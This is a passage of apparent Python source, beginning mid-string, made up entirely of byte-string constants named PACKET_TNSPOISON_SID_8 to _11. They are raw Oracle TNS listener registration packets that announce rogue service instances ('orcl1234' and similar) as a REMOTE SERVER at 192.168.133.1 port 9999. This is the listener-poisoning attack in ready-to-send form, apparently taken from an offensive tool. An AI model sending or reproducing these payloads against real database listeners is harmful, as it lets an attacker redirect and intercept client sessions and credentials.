\x0b\x00\x00\x00\x00orcl123\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xd0\x80E2\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00Pf|\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\xa9\x80\x0c\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00\xd0\x80E2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\xa5\x80\x0c\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xb8\x97\x80\x0c\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90f|\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xa8\x80\x0c\x00\x00\x00\x00a!\xb8\xfe\\xa0 i\xc9MY\x8c\xf4\x05\x00\x00\x00\x00\x00\x00\x00`*_.\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xd0\x91T2\xff\x07\x00\x000\x00\x00\x00\x00\x00\x00\x00\xfcf|\x0c\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\\xc6\xbf,\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x97\x80\x0c\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49200))\x00DISPATCHER <machine: 192.168.133.1 , pid: 376>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xfb \x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90\x99 \x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x86\xc7\x00?blNr\x8b3\xc6E\xea\xd1d\xd4p\xc6\xbf,\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00xEl2\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x03\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00X\xcfj2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xfb \x0b\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x98\xc6\xbf,\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8f\x80\x0c\x00\x00\x00\x00orcl123XDB\x00\x10\xcfj2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x008\xcfj2\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc \x0b\x00\x00\x00\x00orcl123\x00'
PACKET_TNSPOISON_SID_8 = b'\x05\xa6\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05\x9c$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00X\xeaI\x0b\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00$\x05\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00x\xf5\xcc\n\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00B\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xa9H\x0b\x00\x00\x00\x00\xb0"\xc8\x9c\r-B\xda\x93U\x97\xfd\x85aY\x8d\t\x00\x00\x00\x00\x00\x00\x00\xc8El2\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02B\x0b\x00\x00\x00\x00\x0b\x00\x00\x00d\x00\x00\x00\x03\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\n\x00\x00\x00`\xf5\xcc\n\x00\x00\x00\x00orcl1234\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x10SC2\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe8RC2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\xa8H\x0b\x00\x00\x00\x00orcl1234XDB\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x10SC2\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fH\x0b\x00\x00\x00\x00orcl1234XDB\x00\x01\x00\x00\x00\t\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00h\xd4i2\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\\xd4i2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\xa7H\x0b\x00\x00\x00\x00orcl1234\x00\t\x00\x00\x00\x00\x00\x00\x00h\xd4i2\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x10\xfc\xcc\n\x00\x00\x00\x00orcl1234\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00(\xa7\x9c,\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00PfB\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\xaaH\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00(\xa7\x9c,\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xa6H\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xa8\x97H\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90fB\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xa8H\x0b\x00\x00\x00\x00\xf0\x97\x10e,\xdeC\x06\x95:\xf5i\x19B\xa1\x8c\x05\x00\x00\x00\x00\x00\x00\x00`*_.\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xc0\x91T2\xff\x07\x00\x001\x00\x00\x00\x00\x00\x00\x00\xfcfB\x0b\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\x00\xb8RC2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x90\x97H\x0b\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49173))\x00DISPATCHER <machine: 192.168.133.1 , pid: 2552>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xc8\xfb\xcc\n\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x88\x99\xcc\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x005\x14\xfa6\xc2\x96B\xcd\xb4\xfdwN\xb6\x04Z\xb8\xe8RC2\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00pEl2\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x1b\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x90\xd4i2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xb0\xfb\xcc\n\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x10SC2\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fH\x0b\x00\x00\x00\x00orcl1234XDB\\xd4i2\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\t\x00\x00\x00\x00\x00\x00\x00h\xd4i2\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x10\xfc\xcc\n\x00\x00\x00\x00orcl1234\x00'
PACKET_TNSPOISON_SID_9 = b"\x05\xae\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05\xa4$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00\x98\xe9Z\x0b\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00,\x05\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xf5\xdc\n\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00M\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xa8Y\x0b\x00\x00\x00\x00Bm\x0eck\x8aA\x92\xafG\xbc\xa8>X\xd0U\n\x00\x00\x00\x00\x00\x00\x00\xc8E\xac%\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02M\x0b\x00\x00\x00\x00\n\x00\x00\x00d\x00\x00\x00\x01\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\xf5\xdc\n\x00\x00\x00\x00orcl12345\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\r\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00p\xab\x8a%\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00H\xab\x8a%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\xa7Y\x0b\x00\x00\x00\x00orcl12345XDB\x00\r\x00\x00\x00\x00\x00\x00\x00p\xab\x8a%\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fY\x0b\x00\x00\x00\x00orcl12345XDB\x00\x01\x00\x00\x00\n\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xa8\xd9\xa8%\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xd9\xa8%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\xa6Y\x0b\x00\x00\x00\x00orcl12345\x00\n\x00\x00\x00\x00\x00\x00\x00\xa8\xd9\xa8%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc\xdc\n\x00\x00\x00\x00orcl12345\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x08\x9c\xfa\x1f\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00PfM\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\xa9Y\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00\x08\x9c\xfa\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xa5Y\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xa8\x97Y\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90fM\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xa7Y\x0b\x00\x00\x00\x00(\xee\x94\x07\x12\nK\x99\x9bA\x91\x9f'-\x94\xe0\x05\x00\x00\x00\x00\x00\x00\x00`Z\xf6!\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xc0\x91\x94%\xff\x07\x00\x001\x00\x00\x00\x00\x00\x00\x00\xfcfM\x0b\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\x00\x18\xab\x8a%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x97Y\x0b\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49206))\x00DISPATCHER <machine: 192.168.133.1 , pid: 1336>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xfb\xdc\n\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90\x99\xdc\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00=iA\x97\xbd\xdbD*\xa7L\x940V\xa3Q\xd4H\xab\x8a%\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00pE\xac%\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x05\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\xd0\xd9\xa8%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xfb\xdc\n\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\r\x00\x00\x00\x00\x00\x00\x00p\xab\x8a%\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fY\x0b\x00\x00\x00\x00orcl12345XDB\x00\x80\xd9\xa8%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x00\x00\x00\x00\x00\x00\xa8\xd9\xa8%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc\xdc\n\x00\x00\x00\x00orcl12345\x00\x00"
PACKET_TNSPOISON_SID_10 = b'\x05\xb6\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05\xac$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00\x18\xea>\x0b\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x004\x05\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xf5 \x0b\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00F\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\xa9=\x0b\x00\x00\x00\x00\x11\xe3\n\xfc|_CX\x90\xa9\xb6\xc76H7\xa6\x0b\x00\x00\x00\x00\x00\x00\x00\xc8E\xac%\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02F\x0b\x00\x00\x00\x00\n\x00\x00\x00d\x00\x00\x00\x01\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00h\xf5 \x0b\x00\x00\x00\x00orcl123456\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\x0e\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x10S\x83%\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe8R\x83%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\xa7=\x0b\x00\x00\x00\x00orcl123456XDB\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x10S\x83%\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8f=\x0b\x00\x00\x00\x00orcl123456XDB\x00\x01\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00h\xd4\xa9%\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\\xd4\xa9%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x008\xa7=\x0b\x00\x00\x00\x00orcl123456\x00\x0b\x00\x00\x00\x00\x00\x00\x00h\xd4\xa9%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc \x0b\x00\x00\x00\x00orcl123456\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xf8Y\xf1\x1f\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00PfF\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\xaa=\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00\xf8Y\xf1\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\xa6=\x0b\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xa8\x97=\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90fF\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa8\xa8=\x0b\x00\x00\x00\x00\xcdUa\xa1\xe4\x95I\xf7\xb8}hE\xcc\xf6\xd3\xe2\x05\x00\x00\x00\x00\x00\x00\x00`Z\xf6!\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xc0\x91\x94%\xff\x07\x00\x000\x00\x00\x00\x00\x00\x00\x00\xfcfF\x0b\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\x00\xb8R\x83%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x97=\x0b\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49210))\x00DISPATCHER <machine: 192.168.133.1 , pid: 312>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xfb \x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90\x99 \x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdf4\xad\xc8\x02"Lx\xb8\xcc\x18\xd4*B\xe1\xe9\xe8R\x83%\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00pE\xac%\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x14\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x90\xd4\xa9%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xb8\xfb \x0b\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x10S\x83%\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8f=\x0b\x00\x00\x00\x00orcl123456XDB\\xd4\xa9%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00h\xd4\xa9%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc \x0b\x00\x00\x00\x00orcl123456\x00\x00\x00\x00'
PACKET_TNSPOISON_SID_11 = b'\x05\xba\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x05\xb0$\x08\xff\x03\x01\x00\x1244xx4x\x10\x102\x102\x102Tv\x102\x102Tv\x00x\x102Tv\x00\x00H\x00\x00\x80\x02\x00\x00\x00\x00\x04\x00\x00\x98\xe9l\x0c\x00\x00\x00\x00\x90\x00#\x00\x00\x00BEC76C2CC136-5F9F-E034-0003BA1374B3\x03\x00e\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x008\x05\x00\x80\x05\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x80\xf5"\x0b\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xb0\x00?\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa0\xa8k\x0c\x00\x00\x00\x00\x8aZ!\x19\x1e\xa5C\xe6\xbb\xb9\xca\xb5\xb9J0y\x0c\x00\x00\x00\x00\x00\x00\x00\xc8E\xac%\xff\x07\x00\x00\x17\x00\x00\x00\x00\x00\x00\x00\x88\x02?\x0c\x00\x00\x00\x00\n\x00\x00\x00d\x00\x00\x00\x01\x00\x00\x00\xf7\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00h\xf5"\x0b\x00\x00\x00\x00orcl1234567\x00(HOST=192.168.133.1 )\x00\x01\x00\x00\x00\x0f\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00X\x8c\xff\x1f\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x000\x8c\xff\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x000\xa7k\x0c\x00\x00\x00\x00orcl1234567XDB\x00\x0f\x00\x00\x00\x00\x00\x00\x00X\x8c\xff\x1f\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fk\x0c\x00\x00\x00\x00orcl1234567XDB\x00\x01\x00\x00\x00\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00(\xcf\xaa%\xff\x07\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\xcf\xaa%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\xa6k\x0c\x00\x00\x00\x00orcl1234567\x00\x0c\x00\x00\x00\x00\x00\x00\x00(\xcf\xaa%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc"\x0b\x00\x00\x00\x00orcl1234567\x00\x01\x00\x00\x00E\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xc0R\x84%\xff\x07\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00Pf?\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00X\xa9k\x0c\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00E\x00\x00\x00\x00\x00\x00\x00\xc0R\x84%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xa5k\x0c\x00\x00\x00\x00(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.56.1)(PORT=1521)))\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xa8\x97k\x0c\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90f?\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xa7k\x0c\x00\x00\x00\x00\xfa\xa3\xbc\x0b\xde\xc7K\x1c\xb4-\x93\x1b\x13rM\xa2\x05\x00\x00\x00\x00\x00\x00\x00`Z\xf6!\xff\x07\x00\x00;\x00\x00\x00\x00\x00\x00\x00\xc0\x91\x94%\xff\x07\x00\x000\x00\x00\x00\x00\x00\x00\x00\xfcf?\x0c\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x04\x10\x00\x00\x01\x00\x00\x00\x00\x8c\xff\x1f\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x97k\x0c\x00\x00\x00\x00D000\x00(ADDRESS=(PROTOCOL=tcp)(HOST=192.168.133.1 )(PORT=49214))\x00DISPATCHER <machine: 192.168.133.1 , pid: 424>\x00\x01\x00\x00\x00\x10\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xd0\xfb"\x0b\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x90\x99"\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd9\x93\x83Dr_L\xf4\x95\x99\x9b\xde\xf0\x0b<\x8d0\x8c\xff\x1f\xff\x07\x00\x00\n\x00\x00\x00\x00\x00\x00\x00,T{G\x01\x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00pE\xac%\xff\x07\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\xf0y{G\x01\x00\x00\x00\x03\x00\x00\x00\x95\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00P\xcf\xaa%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xb8\xfb"\x0b\x00\x00\x00\x00DEDICATED\x00(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.133.1 )(PORT=9999))\x00REMOTE SERVER\x00\x0f\x00\x00\x00\x00\x00\x00\x00X\x8c\xff\x1f\xff\x07\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00p\x8fk\x0c\x00\x00\x00\x00orcl1234567XDB\x00\x00\xcf\xaa%\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00(\xcf\xaa%\xff\x07\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x18\xfc"\x0b\x00\x00\x00\x00orcl1234567\x00'
